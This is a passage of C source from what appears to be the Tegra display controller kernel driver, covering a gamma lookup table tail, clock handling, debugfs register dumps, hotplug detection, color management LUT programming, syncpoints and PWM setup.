51, 51, 51, 52, 52, 52, 52, 52,
53, 53, 53, 53, 53, 54, 54, 54,
54, 54, 55, 55, 55, 55, 55, 55,
56, 56, 56, 56, 56, 57, 57, 57,
57, 57, 57, 58, 58, 58, 58, 58,
58, 59, 59, 59, 59, 59, 59, 60,
60, 60, 60, 60, 60, 61, 61, 61,
61, 61, 61, 62, 62, 62, 62, 62,
62, 63, 63, 63, 63, 63, 63, 64,
64, 64, 64, 64, 64, 64, 65, 65,
65, 65, 65, 65, 66, 66, 66, 66,
66, 66, 66, 67, 67, 67, 67, 67,
67, 67, 68, 68, 68, 68, 68, 68,
68, 69, 69, 69, 69, 69, 69, 69,
70, 70, 70, 70, 70, 70, 70, 71,
71, 71, 71, 71, 71, 71, 72, 72,
72, 72, 72, 72, 72, 72, 73, 73,
73, 73, 73, 73, 73, 74, 74, 74,
74, 74, 74, 74, 74, 75, 75, 75,
75, 75, 75, 75, 75, 76, 76, 76,
76, 76, 76, 76, 77, 77, 77, 77,
77, 77, 77, 77, 78, 78, 78, 78,
78, 78, 78, 78, 78, 79, 79, 79,
79, 79, 79, 79, 79, 80, 80, 80,
80, 80, 80, 80, 80, 81, 81, 81,
81, 81, 81, 81, 81, 81, 82, 82,
82, 82, 82, 82, 82, 82, 83, 83,
83, 83, 83, 83, 83, 83, 83, 84,
84, 84, 84, 84, 84, 84, 84, 84,
85, 85, 85, 85, 85, 85, 85, 85,
85, 86, 86, 86, 86, 86, 86, 86,
86, 86, 87, 87, 87, 87, 87, 87,
87, 87, 87, 88, 88, 88, 88, 88,
88, 88, 88, 88, 88, 89, 89, 89,
89, 89, 89, 89, 89, 89, 90, 90,
90, 90, 90, 90, 90, 90, 90, 90,
91, 91, 91, 91, 91, 91, 91, 91,
91, 91, 92, 92, 92, 92, 92, 92,
92, 92, 92, 92, 93, 93, 93, 93,
93, 93, 93, 93, 93, 93, 94, 94,
94, 94, 94, 94, 94, 94, 94, 94,
95, 95, 95, 95, 95, 95, 95, 95,
95, 95, 96, 96, 96, 96, 96, 96,
96, 96, 96, 96, 96, 97, 97, 97,
97, 97, 97, 97, 97, 97, 97, 98,
98, 98, 98, 98, 98, 98, 98, 98,
98, 98, 99, 99, 99, 99, 99, 99,
99, 100, 101, 101, 102, 103, 103, 104,
105, 105, 106, 107, 107, 108, 109, 109,
110, 111, 111, 112, 113, 113, 114, 115,
115, 116, 116, 117, 118, 118, 119, 119,
120, 120, 121, 122, 122, 123, 123, 124,
124, 125, 126, 126, 127, 127, 128, 128,
129, 129, 130, 130, 131, 131, 132, 132,
133, 133, 134, 134, 135, 135, 136, 136,
137, 137, 138, 138, 139, 139, 140, 140,
141, 141, 142, 142, 143, 143, 144, 144,
145, 145, 145, 146, 146, 147, 147, 148,
148, 149, 149, 150, 150, 150, 151, 151,
152, 152, 153, 153, 153, 154, 154, 155,
155, 156, 156, 156, 157, 157, 158, 158,
158, 159, 159, 160, 160, 160, 161, 161,
162, 162, 162, 163, 163, 164, 164, 164,
165, 165, 166, 166, 166, 167, 167, 167,
168, 168, 169, 169, 169, 170, 170, 170,
171, 171, 172, 172, 172, 173, 173, 173,
174, 174, 174, 175, 175, 176, 176, 176,
177, 177, 177, 178, 178, 178, 179, 179,
179, 180, 180, 180, 181, 181, 182, 182,
182, 183, 183, 183, 184, 184, 184, 185,
185, 185, 186, 186, 186, 187, 187, 187,
188, 188, 188, 189, 189, 189, 189, 190,
190, 190, 191, 191, 191, 192, 192, 192,
193, 193, 193, 194, 194, 194, 195, 195,
195, 196, 196, 196, 196, 197, 197, 197,
198, 198, 198, 199, 199, 199, 200, 200,
200, 200, 201, 201, 201, 202, 202, 202,
202, 203, 203, 203, 204, 204, 204, 205,
205, 205, 205, 206, 206, 206, 207, 207,
207, 207, 208, 208, 208, 209, 209, 209,
209, 210, 210, 210, 211, 211, 211, 211,
212, 212, 212, 213, 213, 213, 213, 214,
214, 214, 214, 215, 215, 215, 216, 216,
216, 216, 217, 217, 217, 217, 218, 218,
218, 219, 219, 219, 219, 220, 220, 220,
220, 221, 221, 221, 221, 222, 222, 222,
223, 223, 223, 223, 224, 224, 224, 224,
225, 225, 225, 225, 226, 226, 226, 226,
227, 227, 227, 227, 228, 228, 228, 228,
229, 229, 229, 229, 230, 230, 230, 230,
231, 231, 231, 231, 232, 232, 232, 232,
233, 233, 233, 233, 234, 234, 234, 234,
235, 235, 235, 235, 236, 236, 236, 236,
237, 237, 237, 237, 238, 238, 238, 238,
239, 239, 239, 239, 240, 240, 240, 240,
240, 241, 241, 241, 241, 242, 242, 242,
242, 243, 243, 243, 243, 244, 244, 244,
244, 244, 245, 245, 245, 245, 246, 246,
246, 246, 247, 247, 247, 247, 247, 248,
248, 248, 248, 249, 249, 249, 249, 249,
250, 250, 250, 250, 251, 251, 251, 251,
251, 252, 252, 252, 252, 253, 253, 253,
253, 253, 254, 254, 254, 254, 255, 255,
},
};
#endif
void tegra_dc_clk_enable(struct tegra_dc *dc)
{
if (!tegra_is_clk_enabled(dc->clk)) {
clk_prepare_enable(dc->clk);
tegra_dvfs_set_rate(dc->clk, dc->mode.pclk);
}
}
void tegra_dc_clk_disable(struct tegra_dc *dc)
{
if (tegra_is_clk_enabled(dc->clk)) {
clk_disable_unprepare(dc->clk);
tegra_dvfs_set_rate(dc->clk, 0);
}
}
void tegra_dc_hold_dc_out(struct tegra_dc *dc)
{
/* extra reference to dc clk */
clk_prepare_enable(dc->clk);
if (dc->out_ops->hold)
dc->out_ops->hold(dc);
}
void tegra_dc_release_dc_out(struct tegra_dc *dc)
{
if (dc->out_ops->release)
dc->out_ops->release(dc);
/* balance extra dc clk reference */
clk_disable_unprepare(dc->clk);
}
#define DUMP_REG(a) do { \
snprintf(buff, sizeof(buff), "%-32s\t%03x\t%08lx\n", \
#a, a, tegra_dc_readl(dc, a)); \
print(data, buff); \
} while (0)
static void _dump_regs(struct tegra_dc *dc, void *data,
void (* print)(void *data, const char *str))
{
int i;
char buff[256];
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
DUMP_REG(DC_CMD_DISPLAY_COMMAND_OPTION0);
DUMP_REG(DC_CMD_DISPLAY_COMMAND);
DUMP_REG(DC_CMD_SIGNAL_RAISE);
DUMP_REG(DC_CMD_INT_STATUS);
DUMP_REG(DC_CMD_INT_MASK);
DUMP_REG(DC_CMD_INT_ENABLE);
DUMP_REG(DC_CMD_INT_TYPE);
DUMP_REG(DC_CMD_INT_POLARITY);
DUMP_REG(DC_CMD_SIGNAL_RAISE1);
DUMP_REG(DC_CMD_SIGNAL_RAISE2);
DUMP_REG(DC_CMD_SIGNAL_RAISE3);
DUMP_REG(DC_CMD_STATE_ACCESS);
DUMP_REG(DC_CMD_STATE_CONTROL);
DUMP_REG(DC_CMD_DISPLAY_WINDOW_HEADER);
DUMP_REG(DC_CMD_REG_ACT_CONTROL);
DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS0);
DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS1);
DUMP_REG(DC_DISP_DISP_WIN_OPTIONS);
DUMP_REG(DC_DISP_MEM_HIGH_PRIORITY);
DUMP_REG(DC_DISP_MEM_HIGH_PRIORITY_TIMER);
DUMP_REG(DC_DISP_DISP_TIMING_OPTIONS);
DUMP_REG(DC_DISP_REF_TO_SYNC);
DUMP_REG(DC_DISP_SYNC_WIDTH);
DUMP_REG(DC_DISP_BACK_PORCH);
DUMP_REG(DC_DISP_DISP_ACTIVE);
DUMP_REG(DC_DISP_FRONT_PORCH);
DUMP_REG(DC_DISP_H_PULSE0_CONTROL);
DUMP_REG(DC_DISP_H_PULSE0_POSITION_A);
DUMP_REG(DC_DISP_H_PULSE0_POSITION_B);
DUMP_REG(DC_DISP_H_PULSE0_POSITION_C);
DUMP_REG(DC_DISP_H_PULSE0_POSITION_D);
DUMP_REG(DC_DISP_H_PULSE1_CONTROL);
DUMP_REG(DC_DISP_H_PULSE1_POSITION_A);
DUMP_REG(DC_DISP_H_PULSE1_POSITION_B);
DUMP_REG(DC_DISP_H_PULSE1_POSITION_C);
DUMP_REG(DC_DISP_H_PULSE1_POSITION_D);
DUMP_REG(DC_DISP_H_PULSE2_CONTROL);
DUMP_REG(DC_DISP_H_PULSE2_POSITION_A);
DUMP_REG(DC_DISP_H_PULSE2_POSITION_B);
DUMP_REG(DC_DISP_H_PULSE2_POSITION_C);
DUMP_REG(DC_DISP_H_PULSE2_POSITION_D);
DUMP_REG(DC_DISP_V_PULSE0_CONTROL);
DUMP_REG(DC_DISP_V_PULSE0_POSITION_A);
DUMP_REG(DC_DISP_V_PULSE0_POSITION_B);
DUMP_REG(DC_DISP_V_PULSE0_POSITION_C);
DUMP_REG(DC_DISP_V_PULSE1_CONTROL);
DUMP_REG(DC_DISP_V_PULSE1_POSITION_A);
DUMP_REG(DC_DISP_V_PULSE1_POSITION_B);
DUMP_REG(DC_DISP_V_PULSE1_POSITION_C);
DUMP_REG(DC_DISP_V_PULSE2_CONTROL);
DUMP_REG(DC_DISP_V_PULSE2_POSITION_A);
DUMP_REG(DC_DISP_V_PULSE3_CONTROL);
DUMP_REG(DC_DISP_V_PULSE3_POSITION_A);
DUMP_REG(DC_DISP_M0_CONTROL);
DUMP_REG(DC_DISP_M1_CONTROL);
DUMP_REG(DC_DISP_DI_CONTROL);
DUMP_REG(DC_DISP_PP_CONTROL);
DUMP_REG(DC_DISP_PP_SELECT_A);
DUMP_REG(DC_DISP_PP_SELECT_B);
DUMP_REG(DC_DISP_PP_SELECT_C);
DUMP_REG(DC_DISP_PP_SELECT_D);
DUMP_REG(DC_DISP_DISP_CLOCK_CONTROL);
DUMP_REG(DC_DISP_DISP_INTERFACE_CONTROL);
DUMP_REG(DC_DISP_DISP_COLOR_CONTROL);
DUMP_REG(DC_DISP_SHIFT_CLOCK_OPTIONS);
DUMP_REG(DC_DISP_DATA_ENABLE_OPTIONS);
DUMP_REG(DC_DISP_SERIAL_INTERFACE_OPTIONS);
DUMP_REG(DC_DISP_LCD_SPI_OPTIONS);
DUMP_REG(DC_DISP_BORDER_COLOR);
DUMP_REG(DC_DISP_COLOR_KEY0_LOWER);
DUMP_REG(DC_DISP_COLOR_KEY0_UPPER);
DUMP_REG(DC_DISP_COLOR_KEY1_LOWER);
DUMP_REG(DC_DISP_COLOR_KEY1_UPPER);
DUMP_REG(DC_DISP_CURSOR_FOREGROUND);
DUMP_REG(DC_DISP_CURSOR_BACKGROUND);
DUMP_REG(DC_DISP_CURSOR_START_ADDR);
DUMP_REG(DC_DISP_CURSOR_START_ADDR_NS);
DUMP_REG(DC_DISP_CURSOR_POSITION);
DUMP_REG(DC_DISP_CURSOR_POSITION_NS);
DUMP_REG(DC_DISP_INIT_SEQ_CONTROL);
DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_A);
DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_B);
DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_C);
DUMP_REG(DC_DISP_SPI_INIT_SEQ_DATA_D);
DUMP_REG(DC_DISP_DC_MCCIF_FIFOCTRL);
DUMP_REG(DC_DISP_MCCIF_DISPLAY0A_HYST);
DUMP_REG(DC_DISP_MCCIF_DISPLAY0B_HYST);
DUMP_REG(DC_DISP_MCCIF_DISPLAY0C_HYST);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
DUMP_REG(DC_DISP_MCCIF_DISPLAY1B_HYST);
#endif
DUMP_REG(DC_DISP_DAC_CRT_CTRL);
DUMP_REG(DC_DISP_DISP_MISC_CONTROL);
for (i = 0; i < 3; i++) {
print(data, "\n");
snprintf(buff, sizeof(buff), "WINDOW %c:\n", 'A' + i);
print(data, buff);
tegra_dc_writel(dc, WINDOW_A_SELECT << i,
DC_CMD_DISPLAY_WINDOW_HEADER);
DUMP_REG(DC_CMD_DISPLAY_WINDOW_HEADER);
DUMP_REG(DC_WIN_WIN_OPTIONS);
DUMP_REG(DC_WIN_BYTE_SWAP);
DUMP_REG(DC_WIN_BUFFER_CONTROL);
DUMP_REG(DC_WIN_COLOR_DEPTH);
DUMP_REG(DC_WIN_POSITION);
DUMP_REG(DC_WIN_SIZE);
DUMP_REG(DC_WIN_PRESCALED_SIZE);
DUMP_REG(DC_WIN_H_INITIAL_DDA);
DUMP_REG(DC_WIN_V_INITIAL_DDA);
DUMP_REG(DC_WIN_DDA_INCREMENT);
DUMP_REG(DC_WIN_LINE_STRIDE);
#if defined(CONFIG_ARCH_TEGRA_2x_SOC) || defined(CONFIG_ARCH_TEGRA_3x_SOC)
DUMP_REG(DC_WIN_BUF_STRIDE);
DUMP_REG(DC_WIN_UV_BUF_STRIDE);
#endif
DUMP_REG(DC_WIN_BLEND_NOKEY);
DUMP_REG(DC_WIN_BLEND_1WIN);
DUMP_REG(DC_WIN_BLEND_2WIN_X);
DUMP_REG(DC_WIN_BLEND_2WIN_Y);
DUMP_REG(DC_WIN_BLEND_3WIN_XY);
DUMP_REG(DC_WINBUF_START_ADDR);
DUMP_REG(DC_WINBUF_START_ADDR_U);
DUMP_REG(DC_WINBUF_START_ADDR_V);
DUMP_REG(DC_WINBUF_ADDR_H_OFFSET);
DUMP_REG(DC_WINBUF_ADDR_V_OFFSET);
DUMP_REG(DC_WINBUF_UFLOW_STATUS);
DUMP_REG(DC_WIN_CSC_YOF);
DUMP_REG(DC_WIN_CSC_KYRGB);
DUMP_REG(DC_WIN_CSC_KUR);
DUMP_REG(DC_WIN_CSC_KVR);
DUMP_REG(DC_WIN_CSC_KUG);
DUMP_REG(DC_WIN_CSC_KVG);
DUMP_REG(DC_WIN_CSC_KUB);
DUMP_REG(DC_WIN_CSC_KVB);
}
DUMP_REG(DC_CMD_DISPLAY_POWER_CONTROL);
DUMP_REG(DC_COM_PIN_OUTPUT_ENABLE2);
DUMP_REG(DC_COM_PIN_OUTPUT_POLARITY2);
DUMP_REG(DC_COM_PIN_OUTPUT_DATA2);
DUMP_REG(DC_COM_PIN_INPUT_ENABLE2);
DUMP_REG(DC_COM_PIN_OUTPUT_SELECT5);
DUMP_REG(DC_DISP_DISP_SIGNAL_OPTIONS0);
DUMP_REG(DC_DISP_M1_CONTROL);
DUMP_REG(DC_COM_PM1_CONTROL);
DUMP_REG(DC_COM_PM1_DUTY_CYCLE);
DUMP_REG(DC_DISP_SD_CONTROL);
#if !defined(CONFIG_ARCH_TEGRA_2x_SOC) && !defined(CONFIG_ARCH_TEGRA_3x_SOC)
DUMP_REG(DC_COM_CMU_CSC_KRR);
DUMP_REG(DC_COM_CMU_CSC_KGR);
DUMP_REG(DC_COM_CMU_CSC_KBR);
DUMP_REG(DC_COM_CMU_CSC_KRG);
DUMP_REG(DC_COM_CMU_CSC_KGG);
DUMP_REG(DC_COM_CMU_CSC_KBR);
DUMP_REG(DC_COM_CMU_CSC_KRB);
DUMP_REG(DC_COM_CMU_CSC_KGB);
DUMP_REG(DC_COM_CMU_CSC_KBB);
#endif
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
}
#undef DUMP_REG
#ifdef DEBUG
static void dump_regs_print(void *data, const char *str)
{
struct tegra_dc *dc = data;
dev_dbg(&dc->ndev->dev, "%s", str);
}
static void dump_regs(struct tegra_dc *dc)
{
_dump_regs(dc, dc, dump_regs_print);
}
#else /* !DEBUG */
static void dump_regs(struct tegra_dc *dc) {}
#endif /* DEBUG */
#ifdef CONFIG_DEBUG_FS
static void dbg_regs_print(void *data, const char *str)
{
struct seq_file *s = data;
seq_printf(s, "%s", str);
}
#undef DUMP_REG
static int dbg_dc_show(struct seq_file *s, void *unused)
{
struct tegra_dc *dc = s->private;
_dump_regs(dc, s, dbg_regs_print);
return 0;
}
static int dbg_dc_open(struct inode *inode, struct file *file)
{
return single_open(file, dbg_dc_show, inode->i_private);
}
static const struct file_operations regs_fops = {
.open = dbg_dc_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static int dbg_dc_mode_show(struct seq_file *s, void *unused)
{
struct tegra_dc *dc = s->private;
struct tegra_dc_mode *m;
mutex_lock(&dc->lock);
m = &dc->mode;
seq_printf(s,
"pclk: %d\n"
"h_ref_to_sync: %d\n"
"v_ref_to_sync: %d\n"
"h_sync_width: %d\n"
"v_sync_width: %d\n"
"h_back_porch: %d\n"
"v_back_porch: %d\n"
"h_active: %d\n"
"v_active: %d\n"
"h_front_porch: %d\n"
"v_front_porch: %d\n"
"stereo_mode: %d\n",
m->pclk, m->h_ref_to_sync, m->v_ref_to_sync,
m->h_sync_width, m->v_sync_width,
m->h_back_porch, m->v_back_porch,
m->h_active, m->v_active,
m->h_front_porch, m->v_front_porch,
m->stereo_mode);
mutex_unlock(&dc->lock);
return 0;
}
static int dbg_dc_mode_open(struct inode *inode, struct file *file)
{
return single_open(file, dbg_dc_mode_show, inode->i_private);
}
static const struct file_operations mode_fops = {
.open = dbg_dc_mode_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static int dbg_dc_stats_show(struct seq_file *s, void *unused)
{
struct tegra_dc *dc = s->private;
mutex_lock(&dc->lock);
seq_printf(s,
"underflows: %llu\n"
"underflows_a: %llu\n"
"underflows_b: %llu\n"
"underflows_c: %llu\n",
dc->stats.underflows,
dc->stats.underflows_a,
dc->stats.underflows_b,
dc->stats.underflows_c);
mutex_unlock(&dc->lock);
return 0;
}
static int dbg_dc_stats_open(struct inode *inode, struct file *file)
{
return single_open(file, dbg_dc_stats_show, inode->i_private);
}
static const struct file_operations stats_fops = {
.open = dbg_dc_stats_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static void tegra_dc_remove_debugfs(struct tegra_dc *dc)
{
if (dc->debugdir)
debugfs_remove_recursive(dc->debugdir);
dc->debugdir = NULL;
}
static void tegra_dc_create_debugfs(struct tegra_dc *dc)
{
struct dentry *retval;
dc->debugdir = debugfs_create_dir(dev_name(&dc->ndev->dev), NULL);
if (!dc->debugdir)
goto remove_out;
retval = debugfs_create_file("regs", S_IRUGO, dc->debugdir, dc,
®s_fops);
if (!retval)
goto remove_out;
retval = debugfs_create_file("mode", S_IRUGO, dc->debugdir, dc,
&mode_fops);
if (!retval)
goto remove_out;
retval = debugfs_create_file("stats", S_IRUGO, dc->debugdir, dc,
&stats_fops);
if (!retval)
goto remove_out;
return;
remove_out:
dev_err(&dc->ndev->dev, "could not create debugfs\n");
tegra_dc_remove_debugfs(dc);
}
#else /* !CONFIG_DEBUGFS */
static inline void tegra_dc_create_debugfs(struct tegra_dc *dc) { };
static inline void __devexit tegra_dc_remove_debugfs(struct tegra_dc *dc) { };
#endif /* CONFIG_DEBUGFS */
static int tegra_dc_set(struct tegra_dc *dc, int index)
{
int ret = 0;
mutex_lock(&tegra_dc_lock);
if (index >= TEGRA_MAX_DC) {
ret = -EINVAL;
goto out;
}
if (dc != NULL && tegra_dcs[index] != NULL) {
ret = -EBUSY;
goto out;
}
tegra_dcs[index] = dc;
out:
mutex_unlock(&tegra_dc_lock);
return ret;
}
unsigned int tegra_dc_has_multiple_dc(void)
{
unsigned int idx;
unsigned int cnt = 0;
struct tegra_dc *dc;
mutex_lock(&tegra_dc_lock);
for (idx = 0; idx < TEGRA_MAX_DC; idx++)
cnt += ((dc = tegra_dcs[idx]) != NULL && dc->enabled) ? 1 : 0;
mutex_unlock(&tegra_dc_lock);
return (cnt > 1);
}
/* get the stride size of a window.
* return: stride size in bytes for window win. or 0 if unavailble. */
int tegra_dc_get_stride(struct tegra_dc *dc, unsigned win)
{
u32 stride;
if (!dc->enabled)
return 0;
BUG_ON(win > DC_N_WINDOWS);
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
tegra_dc_writel(dc, WINDOW_A_SELECT << win,
DC_CMD_DISPLAY_WINDOW_HEADER);
stride = tegra_dc_readl(dc, DC_WIN_LINE_STRIDE);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
return GET_LINE_STRIDE(stride);
}
EXPORT_SYMBOL(tegra_dc_get_stride);
struct tegra_dc *tegra_dc_get_dc(unsigned idx)
{
if (idx < TEGRA_MAX_DC)
return tegra_dcs[idx];
else
return NULL;
}
EXPORT_SYMBOL(tegra_dc_get_dc);
struct tegra_dc_win *tegra_dc_get_window(struct tegra_dc *dc, unsigned win)
{
if (win >= dc->n_windows)
return NULL;
return &dc->windows[win];
}
EXPORT_SYMBOL(tegra_dc_get_window);
bool tegra_dc_get_connected(struct tegra_dc *dc)
{
return dc->connected;
}
EXPORT_SYMBOL(tegra_dc_get_connected);
bool tegra_dc_hpd(struct tegra_dc *dc)
{
int sense;
int level;
int hpd;
if (WARN_ON(!dc || !dc->out))
return false;
if (dc->out->hotplug_state != 0) {
if (dc->out->hotplug_state == 1) /* force on */
return true;
if (dc->out->hotplug_state == -1) /* force off */
return false;
}
level = gpio_get_value_cansleep(dc->out->hotplug_gpio);
sense = dc->out->flags & TEGRA_DC_OUT_HOTPLUG_MASK;
hpd = (sense == TEGRA_DC_OUT_HOTPLUG_HIGH && level) ||
(sense == TEGRA_DC_OUT_HOTPLUG_LOW && !level);
if (dc->out->hotplug_report)
dc->out->hotplug_report(hpd);
return hpd;
}
EXPORT_SYMBOL(tegra_dc_hpd);
static void tegra_dc_set_scaling_filter(struct tegra_dc *dc)
{
unsigned i;
unsigned v0 = 128;
unsigned v1 = 0;
/* linear horizontal and vertical filters */
for (i = 0; i < 16; i++) {
tegra_dc_writel(dc, (v1 << 16) | (v0 << 8),
DC_WIN_H_FILTER_P(i));
tegra_dc_writel(dc, v0,
DC_WIN_V_FILTER_P(i));
v0 -= 8;
v1 += 8;
}
}
#ifdef CONFIG_TEGRA_DC_CMU
static void tegra_dc_cache_cmu(struct tegra_dc_cmu *dst_cmu,
struct tegra_dc_cmu *src_cmu)
{
memcpy(dst_cmu, src_cmu, sizeof(struct tegra_dc_cmu));
}
static void tegra_dc_set_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
u32 val;
u32 i;
for (i = 0; i < 256; i++) {
val = LUT1_ADDR(i) | LUT1_DATA(cmu->lut1[i]);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT1);
}
tegra_dc_writel(dc, cmu->csc.krr, DC_COM_CMU_CSC_KRR);
tegra_dc_writel(dc, cmu->csc.kgr, DC_COM_CMU_CSC_KGR);
tegra_dc_writel(dc, cmu->csc.kbr, DC_COM_CMU_CSC_KBR);
tegra_dc_writel(dc, cmu->csc.krg, DC_COM_CMU_CSC_KRG);
tegra_dc_writel(dc, cmu->csc.kgg, DC_COM_CMU_CSC_KGG);
tegra_dc_writel(dc, cmu->csc.kbg, DC_COM_CMU_CSC_KBG);
tegra_dc_writel(dc, cmu->csc.krb, DC_COM_CMU_CSC_KRB);
tegra_dc_writel(dc, cmu->csc.kgb, DC_COM_CMU_CSC_KGB);
tegra_dc_writel(dc, cmu->csc.kbb, DC_COM_CMU_CSC_KBB);
for (i = 0; i < 960; i++) {
val = LUT2_ADDR(i) | LUT1_DATA(cmu->lut2[i]);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT2);
}
}
void tegra_dc_get_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
u32 val;
u32 i;
bool flags;
val = tegra_dc_readl(dc, DC_DISP_DISP_COLOR_CONTROL);
if (val & CMU_ENABLE)
flags = true;
val &= ~CMU_ENABLE;
tegra_dc_writel(dc, val, DC_DISP_DISP_COLOR_CONTROL);
tegra_dc_writel(dc, GENERAL_UPDATE, DC_CMD_STATE_CONTROL);
tegra_dc_writel(dc, GENERAL_ACT_REQ, DC_CMD_STATE_CONTROL);
/*TODO: Sync up with frame end */
mdelay(20);
for (i = 0; i < 256; i++) {
val = LUT1_READ_EN | LUT1_READ_ADDR(i);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT1_READ);
val = tegra_dc_readl(dc, DC_COM_CMU_LUT1);
cmu->lut1[i] = LUT1_READ_DATA(val);
}
cmu->csc.krr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRR);
cmu->csc.kgr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGR);
cmu->csc.kbr = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBR);
cmu->csc.krg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRG);
cmu->csc.kgg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGG);
cmu->csc.kbg = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBG);
cmu->csc.krb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KRB);
cmu->csc.kgb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KGB);
cmu->csc.kbb = tegra_dc_readl(dc, DC_COM_CMU_CSC_KBB);
for (i = 0; i < 960; i++) {
val = LUT2_READ_EN | LUT2_READ_ADDR(i);
tegra_dc_writel(dc, val, DC_COM_CMU_LUT2_READ);
val = tegra_dc_readl(dc, DC_COM_CMU_LUT2);
cmu->lut2[i] = LUT2_READ_DATA(val);
}
}
EXPORT_SYMBOL(tegra_dc_get_cmu);
int _tegra_dc_update_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
u32 val;
if (dc->pdata->cmu_enable) {
dc->pdata->flags |= TEGRA_DC_FLAG_CMU_ENABLE;
} else {
dc->pdata->flags &= ~TEGRA_DC_FLAG_CMU_ENABLE;
return 0;
}
if (cmu != &dc->cmu) {
tegra_dc_cache_cmu(&dc->cmu, cmu);
/* Disable CMU */
val = tegra_dc_readl(dc, DC_DISP_DISP_COLOR_CONTROL);
if (val & CMU_ENABLE) {
val &= ~CMU_ENABLE;
tegra_dc_writel(dc, val, DC_DISP_DISP_COLOR_CONTROL);
val = GENERAL_UPDATE;
tegra_dc_writel(dc, val, DC_CMD_STATE_CONTROL);
val = GENERAL_ACT_REQ;
tegra_dc_writel(dc, val, DC_CMD_STATE_CONTROL);
/*TODO: Sync up with vsync */
mdelay(20);
}
tegra_dc_set_cmu(dc, &dc->cmu);
}
return 0;
}
int tegra_dc_update_cmu(struct tegra_dc *dc, struct tegra_dc_cmu *cmu)
{
int ret;
mutex_lock(&dc->lock);
if (!dc->enabled) {
mutex_unlock(&dc->lock);
return 0;
}
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
ret = _tegra_dc_update_cmu(dc, cmu);
tegra_dc_set_color_control(dc);
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
return ret;
}
EXPORT_SYMBOL(tegra_dc_update_cmu);
void tegra_dc_cmu_enable(struct tegra_dc *dc, bool cmu_enable)
{
dc->pdata->cmu_enable = cmu_enable;
if (dc->pdata->cmu)
tegra_dc_update_cmu(dc, dc->pdata->cmu);
else
tegra_dc_update_cmu(dc, &default_cmu);
}
#else
#define tegra_dc_cache_cmu(dst_cmu, src_cmu)
#define tegra_dc_set_cmu(dc, cmu)
#define tegra_dc_update_cmu(dc, cmu)
#endif
/* disable_irq() blocks until handler completes, calling this function while
* holding dc->lock can deadlock. */
static inline void disable_dc_irq(const struct tegra_dc *dc)
{
disable_irq(dc->irq);
}
u32 tegra_dc_get_syncpt_id(const struct tegra_dc *dc, int i)
{
return dc->syncpt[i].id;
}
EXPORT_SYMBOL(tegra_dc_get_syncpt_id);
u32 tegra_dc_incr_syncpt_max(struct tegra_dc *dc, int i)
{
u32 max;
mutex_lock(&dc->lock);
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
max = nvhost_syncpt_incr_max_ext(dc->ndev,
dc->syncpt[i].id, ((dc->enabled) ? 1 : 0));
dc->syncpt[i].max = max;
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
mutex_unlock(&dc->lock);
return max;
}
void tegra_dc_incr_syncpt_min(struct tegra_dc *dc, int i, u32 val)
{
mutex_lock(&dc->lock);
if (dc->enabled) {
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
while (dc->syncpt[i].min < val) {
dc->syncpt[i].min++;
nvhost_syncpt_cpu_incr_ext(dc->ndev, dc->syncpt[i].id);
}
tegra_dc_release_dc_out(dc);
tegra_dc_io_end(dc);
}
mutex_unlock(&dc->lock);
}
void
tegra_dc_config_pwm(struct tegra_dc *dc, struct tegra_dc_pwm_params *cfg)
{
unsigned int ctrl;
unsigned long out_sel;
unsigned long cmd_state;
mutex_lock(&dc->lock);
if (!dc->enabled) {
mutex_unlock(&dc->lock);
return;
}
tegra_dc_io_start(dc);
tegra_dc_hold_dc_out(dc);
ctrl = ((cfg->period << PM_PERIOD_SHIFT) |
(cfg->clk_div << PM_CLK_DIVIDER_SHIFT) |
cfg->clk_select);
/* The new value should be effected immediately */
cmd_state = tegra_dc_readl(dc, DC_CMD_STATE_ACCESS);
tegra_dc_writel(dc, (cmd_state | (1 << 2)), DC_CMD_STATE_ACCESS);
switch (cfg->which_pwm) {
case TEGRA_PWM_PM0:
/* Select the LM0 on PM0 */
out_sel = tegra_dc_readl(dc, DC_COM_PIN_OUTPUT_SELECT5);
out_sel &= ~(7 << 0);
out_sel |= (3 << 0);
tegra_dc_writel(dc, out_sel, DC_COM_PIN_OUTPUT_SELECT5);
tegra_dc_writel(dc, ctrl, DC_COM_PM0_CONTROL);
tegra_dc_writel(dc, cfg->duty_cycle, DC_COM_PM0_DUTY_CYCLE);
break;
case TEGRA_PWM_PM1:
/* Select the LM1 on PM1 */
out_sel = tegra_dc_readl(dc, DC_COM_PIN_OUTPUT_SELECT5);
out_sel &= ~(7 << 4);
out_sel |= (3 << 4);
tegra_dc_writel(dc, out_sel, DC_COM_PIN_OUTPUT_SELECT5);
